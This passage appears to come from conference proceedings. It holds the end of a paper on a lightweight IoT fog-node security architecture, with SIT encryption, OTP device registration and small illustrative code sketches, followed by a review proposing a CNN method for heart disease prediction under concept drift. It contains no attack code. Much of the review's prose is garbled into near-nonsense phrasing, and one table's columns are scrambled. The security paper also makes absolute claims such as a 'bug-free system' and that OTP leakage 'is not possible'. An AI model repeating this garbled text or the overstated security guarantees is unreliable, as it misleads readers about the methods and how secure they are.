block (see D. Pro. in Fig. 4) ensures delivery of the processed data to the external world.
A watchdog stored in one-time memory continuously runs and keeps track of any

Fig. 3 Secured IoT end device architecture

spoilage; if any such malignancy is detected, an alert is issued for further necessary
actions, hence a bug-free system. A bug-free system will be more trusted and will establish
a stable CoT, resulting in a robust TEE and hence a trusted fog node.

4.2 Web Interface (WI)

As shown in Fig. 2, the WI allows communication between the IoT end device and the fog
node. The WI has a device id and password block to register and connect an IoT end device
with the fog node. The WI also has an OTP block to authenticate the IoT end device before data
transmission to the fog node.

4.3 IoT End Device

As shown in Fig. 3, the bare metal has the same boot features as in the fog node (see Fig. 2);
thereafter, the third party signature at the software layer is examined and authenticated
by the boot loader [see Fig. 3(2)], and then the software layer is uploaded [see Fig. 3(3)]; thus
a stable chain of trust (CoT) creates a robust TEE, resulting in a trusted IoT end device.
The software layer comprises (i) a sensor data block to store sensed data in a data buffer
[see Fig. 3(4)], (ii) a secure internet of things (SIT) encryption block that encrypts sensed
data using the SIT lightweight algorithm, (iii) a data frame block that converts encrypted
data into data frames by adding the device id in the header [see Fig. 3(5)], (iv) a data
transmission block that transmits data frames to the fog node via the transceiver using the web

Fig. 4 Secured data transmission

interface [see Fig. 3(7)], and (v) a SIT OTP decryption block [see Fig. 3(8)] that decrypts
the OTP from the fog node using the SIT decryption algorithm; the OTP is further sent for device id
verification via the web.
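A minimal sketch of the data-frame step is given below: the encrypted sensor payload is prefixed with a header carrying the device id so that the fog node can identify the source during fragmentation. The 4-byte id and 2-byte length fields are illustrative assumptions, not the actual frame layout of the proposed architecture.

```python
# Minimal sketch of data-frame construction and fog-side parsing. The header
# layout (uint32 device id + uint16 payload length) is an illustrative
# assumption only.

import struct

def build_frame(device_id: int, encrypted_payload: bytes) -> bytes:
    """Header = device id (uint32) + payload length (uint16), then payload."""
    return struct.pack(">IH", device_id, len(encrypted_payload)) + encrypted_payload

def parse_frame(frame: bytes):
    """Fog-side fragmentation: recover the device id and the encrypted payload."""
    device_id, length = struct.unpack(">IH", frame[:6])
    return device_id, frame[6:6 + length]

if __name__ == "__main__":
    frame = build_frame(0x2A, b"\x9c\x01\x7f\x44")   # 4 bytes of ciphertext
    print(parse_frame(frame))                        # (42, b'\x9c\x01\x7fD')
```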

5 Secured Data Transmission

As shown in Fig. 4, in the beginning, when an edge device is ready, the user provides a 64-
bit cipher key [see Fig. 4(1)]. This key is stored in write-once memory and generates
the unique keys for encryption [as shown in Fig. 4(2)]. Thereafter, the sensor data in the
data buffer is encrypted by the SIT encryption algorithm [14] using this unique key [as
mentioned in Fig. 4(3)]. The encrypted data is then converted into data frames [as
presented in Fig. 4(4)], where the device id is included in the header of the encrypted

data packet. The encrypted data packet is sent to the fog node through the transceiver
[as given in Fig. 4(5)]. The fog node receives the data packets [see Fig. 4(5)] and fragments
them to obtain the encrypted data and the device ID of the IoT end device. The fog node here checks
whether the device ID is verified or not [see Fig. 4(6)]. If not verified [see Fig. 4(7)],
the ID is passed to the web interface for verification [see Fig. 4(8)]. Now the user
provides the 64-bit cipher key for the verification of the IoT end device id at the fog node
[see Fig. 4(9)]. Verification of the IoT end device id is done only the first time the IoT end
device connects to the fog node. Once the cipher key is obtained, the fog node's µ-visor
generates an OTP [see Fig. 4(10)]. This OTP is encrypted using the SIT algorithm [see
Fig. 4(11)] and is sent to the transceiver for transmission to the edge device [see
Fig. 4(12)]. The IoT edge device receives the encrypted OTP and passes it to the OTP
decryption block, where it is decrypted using SIT decryption and its unique keys
[see Fig. 4(13)]. The decrypted OTP is then passed to the user [see Fig. 4(14)]. The user
takes this OTP and enters it into the web interface for verification [see Fig. 4(15)].
If the received OTP matches the generated OTP, the device ID and the corresponding
64-bit cipher key are stored in secure storage at the fog node for later verification
[see Fig. 4(16)]. This completes the setup. The next time the IoT end device sends
data, the fog node will fetch the cipher key from the secure storage based on the device
ID [see Fig. 4(17)] to generate the unique key [see Fig. 4(18)] and decrypt the
data using the SIT decryption algorithm [see Fig. 4(19)].
The decrypted data is then sent to the data processing block of the fog node
for further processing [see Fig. 4(20)]. This concludes how the SIT cryptographic
algorithm works on the proposed lightweight architecture, thus making it
secure.
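The sketch below walks through the first-connection part of this flow (roughly steps 6-16 of Fig. 4) in simplified form. A stand-in XOR keystream is used in place of SIT, whose round structure is not reproduced here, so the code only illustrates the message exchange: the fog node issues an encrypted OTP, the user echoes back the decrypted value, and only then are the device id and cipher key stored for later verification.

```python
# Simplified sketch of the first-connection OTP handshake. The toy XOR cipher
# is a placeholder for SIT and is NOT secure; ids, keys and field sizes are
# illustrative assumptions.

import secrets

def toy_encrypt(key: bytes, data: bytes) -> bytes:
    """Stand-in for SIT encryption (XOR keystream, for illustration only)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

toy_decrypt = toy_encrypt  # XOR is its own inverse

class FogNode:
    def __init__(self):
        self.registered = {}   # device_id -> cipher key (secure storage)
        self._pending = {}     # device_id -> (cipher key, issued OTP)

    def request_registration(self, device_id: int, cipher_key: bytes) -> bytes:
        otp = secrets.token_bytes(4)                 # the µ-visor generates an OTP
        self._pending[device_id] = (cipher_key, otp)
        return toy_encrypt(cipher_key, otp)          # encrypted OTP sent to the device

    def verify(self, device_id: int, otp_from_user: bytes) -> bool:
        key, otp = self._pending.pop(device_id)
        if otp_from_user == otp:                     # OTP matches: register the device
            self.registered[device_id] = key
            return True
        return False

if __name__ == "__main__":
    fog = FogNode()
    key = b"\x11\x22\x33\x44\x55\x66\x77\x88"        # 64-bit cipher key from the user
    enc_otp = fog.request_registration(device_id=42, cipher_key=key)
    otp_seen_by_user = toy_decrypt(key, enc_otp)     # end device decrypts the OTP
    print(fog.verify(42, otp_seen_by_user))          # True: device now registered
```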

6 Results and Discussion

To ensure light weight, a host OS was avoided both at the fog node and at the IoT edge. The lightweight
µ-hypervisor was implemented only at the fog node, not at the IoT edge device; hence virtualization
was transferred from the IoT edge to the fog node. The transfer of virtualization minimized the
TCB area, hence minimized resource utilization and memory and enhanced
performance, thus reducing the attack surface at the IoT end device. A bug-free TCB and
authentication between TCBs create a stable chain of trust (CoT), resulting in a robust
TEE (R.TEE). The SIT-encrypted OTP sent by the fog node to the IoT end device during login
ensures CIA. The SIT algorithm consumes only about 22 bytes of memory, with encryption
and decryption execution times of 0.188 and 0.187 ms, respectively. The µ-hypervisor
and software consumed about 32.75% of the total 4 MB flash and 6.30% of the 520 KB
SRAM (i.e., 32.77 KB), giving a total footprint of 39.05%. Based on Table 1, the comparison
graph of the algorithms in Fig. 5 shows that SIT is the best in terms of encryption and decryption
cycle time and code size, and hence the best choice for lightweight secured fog and IoT end devices.

Fig. 5 Comparisons of algorithms

7 Conclusion

The proposed novel IoT architecture implements a stable chain of trust and hence a robust
trusted execution environment for intra-IoT-device security. A trusted connection is
established between IoT end devices and fog nodes before data transmission. End
device verification is performed using an encrypted OTP to guarantee confidentiality
(OTP leakage is not possible), integrity (OTP change is not possible) and authenticity (end
device verification by the user of the device). The implementation of the lightweight SIT
cryptographic algorithm in the proposed novel architecture is done using the Arduino IDE
over ESP32. The results confirm that the lightweight novel IoT architecture consumes
1.31 MB of flash and 32.77 KB of SRAM. The SIT cryptographic algorithm consumes 22
bytes of memory with fast encryption and decryption of 0.375 ms in total. Thus, the proposed
novel architecture guarantees lightweight security in the lightweight novel IoT
architecture.

References

1. Zhang, P. Y., Zhou, M. C., & Fortino, G. (2018). Security and trust issues in fog computing:
A survey. Future Generation Computer Systems, 88, 16–27. https://doi.org/10.1016/j.future.
2018.05.008
2. Dall, C., & Nieh, J. (2014). KVM/ARM. ACM SIGPLAN Notices, 333–348. https://doi.org/
10.1145/2644865.2541946.
3. Cheruvu, S., Kumar, A., Smith, N., & Wheeler, D. M. (2019). Demystifying Internet of Things
Security: Successful IoT Device/Edge and Platform Security Deployment (1st ed.). Apress.
https://doi.org/10.1007/978-1-4842-2896-8.
4. Iqbal, A., Sadeque, N., & Mutia, R.I. (2010). An Overview of microkernel, hypervisor and
microvisor virtualization approaches for embedded systems.
5. Tiburski, R. T., Moratelli, C. R., Filho, S. J., Neves, M. V., Matos, E. D., Amaral, L., &
Hessel, F. (2019). Lightweight security architecture based on embedded virtualization and
trust mechanisms for IoT edge devices. IEEE Communications Magazine, 57, 67–73.

6. Pinto, S., Gomes, T., Pereira, J., Cabral, J., & Tavares, A. (2017). IIoTEED: An enhanced,
trusted execution environment for industrial IoT edge devices. IEEE Internet Computing, 21,
40–47.
7. Dai, W., Jin, H., Zou, D., Xu, S., Zheng, W., Shi, L., & Yang, L. T. (2015). TEE: A virtual DRTM
based execution environment for secure cloud-end computing. Future Generation Computer
System, 49, 47–57.
8. Mishra, P., & Yadav, S. K. (2020) Threats and vulnerabilities to IoT end devices architecture and
suggested remedies. International Journal of Recent Technology and Engineering. 8(6):5712–
5718. https://doi.org/10.35940/ijrte.f9469.038620
9. Amoroso, E. G. (2011). Cyber attacks: Awareness. Network Security, 2011(1), 10–16. https://
doi.org/10.1016/s1353-4858(11)70005-8
10. Mounika, M., & Chinnaswamy, C. N. (2016). A comprehensive review on embedded
hypervisors. IJARCET., 5(5), 1546–1550.
11. Cerdeira, D., Santos, N., Fonseca, P., & Pinto, S. (2020). SoK: Understanding the prevailing
security vulnerabilities in trust zone-assisted TEE systems. IEEE Symposium on Security and
Privacy (SP), 2020, 1416–1432.
12. Shapsough, S., Aloul, F., & Zualkernan, I. (2018). Securing low-resource edge devices for IoT
systems. International Symposium in Sensing and Instrumentation in IoT Era (ISSI), 2018,
1–4.
13. Guan, L., Liu, P., Xing, X., Ge, X., Zhang, S., Yu, M., & Jaeger, T. (2017). TrustShadow:
Secure execution of unmodified applications with ARM TrustZone. In Proceedings of the 15th
Annual International Conference on Mobile Systems, Applications, and Services.
14. Usman, M., Ahmed, I., Aslam, M., Khan, S., & Shah, U. (2017). SIT: A lightweight encryption
algorithm for secure internet of things. ArXiv, abs/1704.08688.
15. Jones, M. (2013). Virtualization for embedded systems: The how and why of small-device
hypervisors.
16. Poettering, B. (2007). Rijndael furious: AES-128 implementation for AVR devices. http://
point-at-infinity.org/avraes/.
17. Eisenbarth, T., Gong, Z., Güneysu, T., Heyse, S., Indesteege, S., Kerckhof, S., Koeune, F., Nad,
T., Plos, T., Regazzoni, F., Standaert, F., & Oldenzeel, L.V. (2012). Compact implementation
and performance evaluation of block ciphers in ATtiny devices. AFRICACRYPT.
18. Koo, W., Lee, H., Kim, Y.H., & Lee, D. (2008). Implementation and analysis of new lightweight
cryptographic algorithm suitable for wireless sensor networks. In 2008 International Confer-
ence on Information Security and Assurance (isa 2008) (pp. 73–76).
19. Guimarães, G., Souto, E., Sadok, D., & Kelner, J. (2005). Evaluation of security mechanisms
in wireless sensor networks. Systems Communications, 2005, 428–433.
Addressing Concept Drifts Using Deep
Learning for Heart Disease Prediction:
A Review

Ketan Sanjay Desale and Swati V. Shinde

Abstract Heart disease is among the most significant causes of morbidity and
mortality in the world's population. Prediction of cardiac
disease is considered one of the most important topics in the
field of medical data analysis. The quantity of data in the medical industry
is very large. Deep learning turns this large amount of raw healthcare data
into information that can support the identification of risks and forecasts. This
paper presents a novel algorithm and evaluation methodology for forecasting
heart disease by means of CNN modeling. The parameters evaluated will be
accuracy, sensitivity, specificity, and positive predictive value (PPV). Such
parameters can be used in a user-friendly manner by doctors to trace out the possibility
of disease.

Keywords Heart disease · Deep learning · Concept drift · ECG

1 Introduction

Machine learning [1, 2] makes use of historic data to determine patterns that indicate
dangerous behavior in incoming data streams. For several machine learning applications,
where such patterns either do not change or change only gradually over time,
extracting patterns from the past to forecast future events is not a cause for concern [3, 4].
Real-world data are normally non-stationary. In many complex data analysis
applications, data evolve over time and need to be examined in near
real time [5]. This causes complications, since forecasts may become less
accurate as time goes by, or opportunities to improve the accuracy may be

K. S. Desale (B) · S. V. Shinde


PCET’s Pimpri Chinchwad College of Engineering, Pune, India
e-mail: ketan.desale@pccoepune.org
S. V. Shinde
e-mail: swati.shinde@pccoepune.org


skipped. Concept drift relates to scenario in the event that the relationship among
the insight data and the focus on shifting, that any model is usually attempting to
alterations overtime. Drifts are categorized improvements straight to both temporary
and long term [6]. Temporary drifts will be nothing at all however, the switch will get
show up at optimum period and so after that, it solves the method whereas Long term
Drifts happen to be it steadily shifts the entire process which interferes with the event
records while operating the features [7]. In pattern identification, any event is known
as covariate shift and dataset change. In signal control, the occurrence is alluded to as
non-stationary. Changes in underpinning data manifest on account of the changing
individualized motivations, variations in populace, hostile actions or perhaps they
can end up being linked to a complicated element of the situations [8, 9].
The challenge of concept drift is certainly of strengthening significance as a grow-
ing number of data are structured in the mode of data streams alternatively as opposed
to stationary sources, and it is impractical to foresee that data allocation stays steady
through a prolonged time frame. It is not astonishing that the issue of concept drift
is analyzed in different research areas including however, absolutely not limited to
pattern mining, machine learning and data mining, data channels, data recuperation,
and so recommended systems [10].
Several techniques for identifying and managing concept drift have been
recommended in the research literature, and several of them have already
demonstrated their capabilities in a wide range of application
domains. A further circumstance is learning in the presence of hidden
variables. User modeling is among the most popular learning
applications, where the learning strategy constructs a model of the user's
goals, which are not directly observable and can change occasionally [12].
Drift likewise develops during monitoring tasks and predictive maintenance, where
degradation or decay of technical components arises over time. Concept drift is used as a
general term to describe computational challenges involving changes over time. Such changes
may be of many distinct kinds, and there are several categories of applications which
necessitate different adaptation approaches [13]. Various kinds of tasks
may be needed based on the intended application, such as regression, ranking,
classification, novelty detection, clustering, and item set mining. Prediction
makes assertions about the future, or about undiscovered properties
of the present. Prediction is probably the most prevalent use
of data mining, and it covers regression and classification steps. Regression [14,
15] is ordinarily encountered in demand forecasting, resource scheduling
optimization, user modeling, and, generally, in applications in which the key
target is to foresee future behavior of prospects. Ranking is a special kind of
prediction, where a partial ordering of alternatives is expected. Classification
is a standard task in diagnosis as well as decision support, for example,
antibiotic resistance prediction, fake data classification, or fake news detection
[16]. Ranking is a general task in recommendation, information retrieval, document
rating, and preference learning application areas. Regression, ranking and classification

are supervised learning tasks, where models are trained on examples for which
the ground truth is available [17].
Furthermore, in medical domain applications, concept drift (CD) needs to be considered
in predictive models for disease prediction, drug prediction, survival prediction,
etc. Hence, this paper presents a research methodology intended for prediction of
human heart conditions in terms of several electrocardiogram (ECG) features.

2 Literature Review

The importance of healthcare technology continues to expand swiftly in both consumer
and medical applications. Individuals increasingly want the ability to monitor
and understand their own health and healthcare with the aid of technology. Smartwatches
and well-being wristbands are both popular devices used to accomplish this. Physicians are
increasingly using such gadgets to observe patient behavior over longer durations, rather
than relying on isolated measurements in a clinical environment [18]. Several
suggestions for updating learning models have been formulated, and a few primary
approaches stand out. Learning models may change progressively; for
example, models may be systematically retrained employing a sliding window of
predetermined size over the previous data [19]. Additionally, learning
systems may implement trigger elements to initiate a model revision. In general, statistical
change detection tests [20] are employed as triggers. Newly arriving
data are consistently examined; if variations are detected, the
trigger raises an alert, and adaptive actions are applied.
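A minimal sketch of such a trigger is shown below (an illustrative scheme, not any specific detector from the cited literature): the error rate on the most recent window of predictions is compared with a reference window, and a drift alarm is raised when the recent error is significantly higher. Window size and the z-threshold are assumptions.

```python
# Illustrative window-based drift trigger: compare the error rate on the most
# recent window with a reference window and raise an alarm when the recent
# error is significantly higher. Window size and threshold are assumptions.

from collections import deque
import math

class WindowDriftDetector:
    def __init__(self, window: int = 100, z_threshold: float = 3.0):
        self.reference = deque(maxlen=window)   # older prediction errors (0/1)
        self.recent = deque(maxlen=window)      # newest prediction errors (0/1)
        self.z_threshold = z_threshold

    def add_error(self, error: int) -> bool:
        """Feed 1 for a misclassified instance, 0 otherwise. Returns True on drift."""
        if len(self.recent) == self.recent.maxlen:
            # the oldest recent error is about to be dropped: move it to reference
            self.reference.append(self.recent[0])
        self.recent.append(error)
        if len(self.reference) < self.reference.maxlen:
            return False                         # not enough history yet
        p_ref = sum(self.reference) / len(self.reference)
        p_new = sum(self.recent) / len(self.recent)
        std = math.sqrt(max(p_ref * (1 - p_ref) / len(self.recent), 1e-12))
        return (p_new - p_ref) / std > self.z_threshold
```

On an alarm, the model would then be retrained on the recent data, as described above.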
If a change is signaled, the old training data are discarded and
the model is updated using the recent data. Learning systems can employ a single model
or a whole suite of models. Single-model methods make use of only one model
for decision making at a given point in time; immediately after the model is updated,
the previous one is completely discarded. Ensembles, on the contrary, preserve
some memory of different models. The outcomes of the experiments reveal that the
recommended approach accomplished the maximum detection reliability and the
minimum percentage of false alarms, while retaining essential classification precision levels,
on synthetic datasets covering distinct categories of drifts [21]. The prediction
decisions are made either by fusing the votes cast by numerous
models or by nominating the most appropriate model for the moment from
the group of existing models. Ensembles may be evolving and may also possess trigger
elements. Evolving ensembles build and validate different models as fresh
data arrive; the procedure for model combination is restructured
based on their effectiveness. Ensembles with triggers proactively designate the
most trusted models for decision making depending on the circumstances [22].
Consequently, the reliability of prompt diagnosis of cardiac
conditions relies upon the robust and accurate detection of QRS complexes together
with the fiducial points in the electrocardiogram (ECG) signal. Irrespective of

the different QRS detection algorithms reported in the literature, the development of a
productive QRS detector continues to be an issue in the medical field.
Zero-crossing techniques are effective in preventing noise and are specifically
practical for fixed-point arithmetic. This detection approach delivers a substantial level
of detection effectiveness even in very noisy ECG signals. In this procedure, the start of an
event is detected when the feature of the signal falls below a signal-adaptive threshold, while the
end is determined when the signal rises above the threshold. The
beginning and end of the event identify the bounds of the search interval
for the eventual localization of the R-wave. If nearby events are
temporally very close, they are merged into one single
event; the starting point of the combined event is the start of the initial
event, and the closure of the merged event is the end of the closing event.
The threshold per stage applied for determining the number of zero-crossings is
predetermined and estimated empirically [23]. The authors of [24] formulated a new approach
for QRS complex detection in ECG signals, employing a particle swarm optimization
(PSO)-based adaptive filter (AF). In the recommended technique, the AF, based
on PSO, is utilized to create the feature, and an efficient detection algorithm is
formulated with look-backs to recover missed peaks [24].
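For orientation, the sketch below shows a very simple threshold-based R-peak detector (it is not the zero-crossing method of [23] nor the PSO-based filter of [24]): samples above a signal-adaptive threshold that are local maxima and respect a refractory period are taken as R-peaks. The sampling rate and refractory period are assumed values.

```python
# Minimal threshold-based R-peak detector for a 1-D ECG signal. The sampling
# rate, threshold rule and refractory period are illustrative assumptions.

import numpy as np

def detect_r_peaks(ecg: np.ndarray, fs: int = 360, refractory_s: float = 0.2):
    """Return sample indices of candidate R-peaks in a 1-D ECG signal."""
    threshold = ecg.mean() + 2.0 * ecg.std()        # signal-adaptive threshold
    refractory = int(refractory_s * fs)             # minimum distance between beats
    peaks = []
    for i in range(1, len(ecg) - 1):
        if ecg[i] > threshold and ecg[i] >= ecg[i - 1] and ecg[i] >= ecg[i + 1]:
            if not peaks or i - peaks[-1] > refractory:
                peaks.append(i)
    return peaks

if __name__ == "__main__":
    t = np.arange(0, 10, 1 / 360)
    ecg = 0.05 * np.random.randn(len(t))
    ecg[::360] += 1.0                                # synthetic R-peaks once per second
    print(len(detect_r_peaks(ecg)))                  # roughly 10 detected beats
```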
In another study, the authors carried out ECG signal preprocessing
and SVM-based arrhythmic beat classification to separate normal from abnormal
subjects. In the ECG signal preprocessing, a delayed error
normalized LMS adaptive filter is used to obtain a high-speed and low-latency
design with reduced computational elements. Since the signal
processing approach is designed for remote medical devices, white noise removal is
primarily targeted. The discrete wavelet transform is applied to the preprocessed
signal for HRV feature extraction, and machine learning approaches are
employed for performing the arrhythmic beat classification [25]. Table 1
summarizes some of the ECG signal evaluation methods.
Another entry was designed for the PhysioNet/CinC challenge, which aims to encourage
the development of algorithms that determine whether a short single-lead
ECG recording shows normal sinus rhythm, atrial fibrillation (AF), an alternative
rhythm, or is too noisy to be classified. The procedure proposed
by the authors combines timing information acquired via QRS detection with features from a
robust process estimator and waveform features, employing a random forest classifier. Hence,
the objective of this research is to identify the research gap, as shown in Table 2, and to
develop a methodology for prediction with the classification of ECG features.

3 Research Methodology

Heart disease continues to be among the most significant causes of fatality around
the world. Heart disease diagnosis is currently costly; consequently, it is vital
to predict the risk of acquiring heart disease from specific features. The feature

Table 1 Analysis of ECG signal evaluation methods
Ref. No. | Author/year | Journal name | Research
[26] | Saurav et al./2018 | ACM |
• In this study, the authors proposed a temporal methodology implementing deep recurrent neural networks (RNNs) for time-series anomaly detection, to resolve issues arising from unanticipated as well as gradual alterations in typical patterns
• When new data become available, the model is trained incrementally and is thus capable of adapting to changes in the data distribution
• The RNN is employed to generate forecasts of the time series, and the prediction errors are used to update the RNN model and to detect anomalies and change points; a change (drift) in normal patterns is detected through a significant prediction error
[27] | Steinberg et al./2019 | Biosensors |
• The detection of arrhythmic disorders is difficult because of their transitory, intermittent nature
• Typical solutions are limited by poor sensitivity; wearable electrocardiogram (ECG) sensors offer an alternative platform for long-term rhythm monitoring
• The analysis was conducted with the aim of determining the signal quality and R-R coverage of a wearable device compared to a standard 3-lead Holter
[28] | Zuo et al./2019 | Springer |
• Time-series classification (TSC) is an important element of time series analysis, which may be utilized in medical diagnosis, human movement identification, industrial maintenance, and so on
• Commonly, the inherent concept drift in a streaming setting is overlooked when training a fixed model from an off-line dataset in TSC; processing time series with realistically evaluated data arriving in a continuous order requires a combination of time series (TS) and data stream approaches

Table 2 Research gap


Ref. No. | Author, year | Existing method | Research gap
[29] Sahmoud et al., 2020 • Author developed • Only classification
dynamic multiobjective accuracy is focused
evolutionary algorithm with
ANN
• Four different dataset
generators used for testing
[30] Duda et al., 2020 • Author used traditional • Proposed method author
stochastic and batch-based applied the idea of boosting
methods and used the strategy to
train the neural network
based on mini-batches
• Aim of research is to • Only Wrongly Classified
accelerate the training of (OWC) approach is used
deep neural networks and no predictive model is
developed
• Bagging-based training
with drift detector
[31] Fedotov et al., 2019 • Mathematical model is • Morphological changes
proposed for simulating can be further evaluated
ECG signal using CNN for ECG
• Heart rate variability • There is a need of
considered as a base for application level
further evaluation development, training, and
validation
[32] Anugirba et al., 2019 • Multistage multiscale • QRS detection algorithms
mathematical morphology of DSP/microprocessor used
is developed for filtering
images
• Grayscale image • New algorithm
morphology is processed development can be done
using CNN framework

selection strategies may be implemented as important approaches to reduce the cost of analysis by selecting the significant features [33]. Hence, the objective of this research is to develop a methodology for prediction and classification of ECG elements.
For the proposed research, the input ECG database will be used for heartbeat classification. The ECG wave is a composite signal comprising the P wave, QRS complex, and T wave. As a preliminary analysis, the QRS complex will be assessed. For the input ECG database, clustering will be used to preprocess the input data according to the ECG wave factors. The proposed research will use Python with TensorFlow and Keras to store and process the dataset clusters. Clustering is required for discovering

groups of observations with similar characteristics. To do this, a distance measure is used to evaluate the similarity between pairs of observations. Clusters are formed by grouping together instances that are close to each other and far from the instances of other clusters. Hierarchical clustering approaches produce a structure that offers more flexibility, since different partitions can be derived from it. The types of data handled by a clustering approach may also vary, including numerical and categorical data. The use of such models substantially reduces computational overhead. Analysis of the electrocardiogram (ECG) signal provides clinicians with valuable information about the patient's heart condition.
The proposed research methodology framework is shown in Fig. 1 which can be
useful for analyzing concept drifts in process mining. The framework identifies the
following steps:
(1) Preprocessing: As an initial step, the arrhythmia dataset will be taken as input. Additionally, for ECG image refinement, we can extract the R-component to locate the peaks; a minimal sketch of this step is given after this paragraph. This step involves identifying the features of the records in an event log. There are four features that define the control-flow perspective of process events in an event log. Based on the target of the evaluation, we may define supplemental features; for example, if we are interested in examining variations from a resource perspective, we can consider aspects based on social networks as a way of characterizing the event log. In addition to feature extraction, this stage also includes feature selection. Feature selection is necessary when the number of extracted features is large.
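As a rough illustration of the R-peak localization mentioned above, the following sketch uses SciPy's peak finder on a single-lead signal; the amplitude and spacing thresholds are illustrative assumptions, not values taken from the paper.

```python
import numpy as np
from scipy.signal import find_peaks

def extract_r_peaks(ecg, fs):
    """Locate R peaks in a single-lead ECG signal.

    ecg : 1-D NumPy array of ECG samples
    fs  : sampling frequency in Hz
    Returns the sample indices of the detected R peaks.
    """
    # Normalize the signal so a fixed amplitude threshold is meaningful.
    ecg = (ecg - np.mean(ecg)) / (np.std(ecg) + 1e-12)
    # Assume R peaks are at least 0.4 s apart (heart rate below 150 bpm)
    # and rise at least 1.5 standard deviations above the mean.
    peaks, _ = find_peaks(ecg, height=1.5, distance=int(0.4 * fs))
    return peaks

# Example with a crude synthetic spike train:
# fs = 360
# t = np.arange(0, 10, 1 / fs)
# ecg = np.sin(2 * np.pi * 1.2 * t) ** 20
# print(extract_r_peaks(ecg, fs))
```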
(2) CNN Processing: A CNN is composed of three key units: the convolution layer, the pooling layer, and the classification layer. In the convolution layer, the feature map is produced by applying a filter kernel to compute the convolution of the input data, thereby improving discrimination. In the pooling layer, the feature map is reduced, constraining the dimensions of the input data [34]. Finally, the classification layer performs the final discrimination of the source data by means of a fully connected network. Here, the learning procedure uses feed-forward and backpropagation methods (a small model sketch is given below). An event log can be converted directly into a data stream based on the features selected in the earlier step. This step deals with determining the sample populations used for learning the variations in the features of traces. Different scenarios may be considered for producing such populations from the data stream.
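To make the three units concrete, the following Keras sketch builds a small 1-D CNN over fixed-length beat segments; the segment length, filter counts, and the five output classes are assumptions for illustration, not the paper's final architecture.

```python
import tensorflow as tf
from tensorflow.keras import layers, models

def build_beat_cnn(segment_len=200, n_classes=5):
    """1-D CNN: convolution -> pooling -> fully connected classification."""
    model = models.Sequential([
        layers.Input(shape=(segment_len, 1)),
        # Convolution layer: produces feature maps from the raw beat segment.
        layers.Conv1D(filters=32, kernel_size=5, activation="relu"),
        # Pooling layer: reduces the size of the feature maps.
        layers.MaxPooling1D(pool_size=2),
        layers.Conv1D(filters=64, kernel_size=5, activation="relu"),
        layers.MaxPooling1D(pool_size=2),
        layers.Flatten(),
        # Classification layer: fully connected network over the pooled features.
        layers.Dense(64, activation="relu"),
        layers.Dense(n_classes, activation="softmax"),
    ])
    model.compile(optimizer="adam",
                  loss="sparse_categorical_crossentropy",
                  metrics=["accuracy"])
    return model

# model = build_beat_cnn()
# model.fit(x_train, y_train, epochs=100, batch_size=32)  # epoch size 100 as in Algorithm 1
```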
(3) Validation and Prediction: Furthermore, QRS complex extraction will be carried out based on a sparse vector of peaks, with removal of true and false signals. The proposed algorithm will be developed and evaluated on real-time ECG data or a benchmark dataset. The algorithm takes the preprocessed data as input, which is then processed using the CNN. Data validation will be done using the formulated CNN model. The arrhythmia dataset validation will be performed by applying time-series and/or ECG image processing.

Fig. 1 Proposed research methodology



Proposed Algorithm: CNNCorazonPredict


Algorithms dealing with concept drift are classified into active and passive variants. The proposed algorithm, named "CNNCorazonPredict" (CCP), is designed as a passive procedure because it avoids issues such as missed or falsely detected drifts; on the other hand, the adaptation speed is very gradual, leading to costly delays in the case of sudden drift. Consequently, we further formulated a CNN model to boost the processing speed, which can avoid such delays. The pseudocode of the proposed algorithm is given below:
Algorithm 1: CNNCorazonPredict pseudocode
Input: arrhythmia dataset (ECG)
Output: accuracy, sensitivity, specificity, positive prediction value (PPV)
1  Initialize data log Di and component array compArr[i]
2  for each record i do
3      identify the Q-R-S components from Di and store them in array allComp[c]
4      for (c = 0; c < length(allComp); c++) do
5          extract the 'R' peak
6          store the 'R' peak value in array allRPeak[]
7  concatenate the convolution layers; define epoch size = 100

When enhanced data are available, the prediction model will be applied for recognition of the forecasted heart conditions. If no disorder prediction value is produced, recurrent concept drift handling is carried out until the model yields prediction outcomes. For the predicted values, hyperparameters will be set for complete training on the dataset. Furthermore, after training, a validation evaluation will be executed to compare the results of the proposed system with existing reported outcomes.
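Since the algorithm's stated outputs are accuracy, sensitivity, specificity, and positive prediction value, a small helper like the following (a sketch, not the authors' code) can derive them from the binary validation labels.

```python
import numpy as np

def binary_metrics(y_true, y_pred):
    """Accuracy, sensitivity, specificity and PPV from binary labels (1 = arrhythmic)."""
    y_true = np.asarray(y_true).astype(bool)
    y_pred = np.asarray(y_pred).astype(bool)
    tp = np.sum(y_true & y_pred)
    tn = np.sum(~y_true & ~y_pred)
    fp = np.sum(~y_true & y_pred)
    fn = np.sum(y_true & ~y_pred)
    accuracy = (tp + tn) / max(tp + tn + fp + fn, 1)
    sensitivity = tp / max(tp + fn, 1)   # recall on the arrhythmic class
    specificity = tn / max(tn + fp, 1)
    ppv = tp / max(tp + fp, 1)           # positive prediction value
    return accuracy, sensitivity, specificity, ppv

# print(binary_metrics([1, 0, 1, 1], [1, 0, 0, 1]))
```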

References

1. Zenisek, J., Holzinger, F., & Affenzeller, M. (2019). Machine learning based concept drift
detection for predictive maintenance. Computers & Industrial Engineering, 137.
2. de Mello, R. F., et al. (2019). On learning guarantees to unsupervised concept drift detection
on data streams. Expert Systems with Applications, 117, 90–102.
3. Cejnek, M., & Bukovsky, I. (2018). Concept drift robust adaptive novelty detection for data
streams. Neurocomputing, 309, https://doi.org/10.1016/j.neucom.2018.04.069.
4. Maria De Marsico, A. P., & Ricciardi, S. (2016). Iris recognition through machine learning
techniques: A survey. Pattern Recognition Letters, 82, (Part 2), 106–115. ISSN 0167-8655.
https://doi.org/10.1016/j.patrec.2016.02.001.
5. Demšar, J., & Bosnić, Z. (2018). Detecting concept drift in data streams using model explana-
tion. Expert Systems with Applications, 92, 546–559.
6. Lu, Y., Cheung, Y.-M., & Tang, Y. Y. (2019). Adaptive chunk-based dynamic weighted majority
for imbalanced data streams with concept drift. IEEE Transactions on Neural Networks and
Learning Systems.

7. Lin, L., et al. (2019). Concept drift based multi-dimensional data streams sampling method. In
Pacific-Asia Conference on Knowledge Discovery and Data Mining. (Vol. 11439, pp. 331–342).
LNAI.
8. Roveri, M. (2019). Learning discrete-time Markov chains under concept drift. IEEE Transac-
tions on Neural Networks and Learning Systems, 30(9), 2570–2582. https://doi.org/10.1109/
TNNLS.2018.2886956.
9. Ryan, S., Corizzo, R., Kiringa, I., & Japkowicz, N. (2019). Deep learning versus conventional
learning in data streams with concept drifts. In 18th IEEE International Conference On Machine
Learning And Applications (ICMLA) (pp. 1306–1313). Boca Raton, FL, USA. https://doi.org/
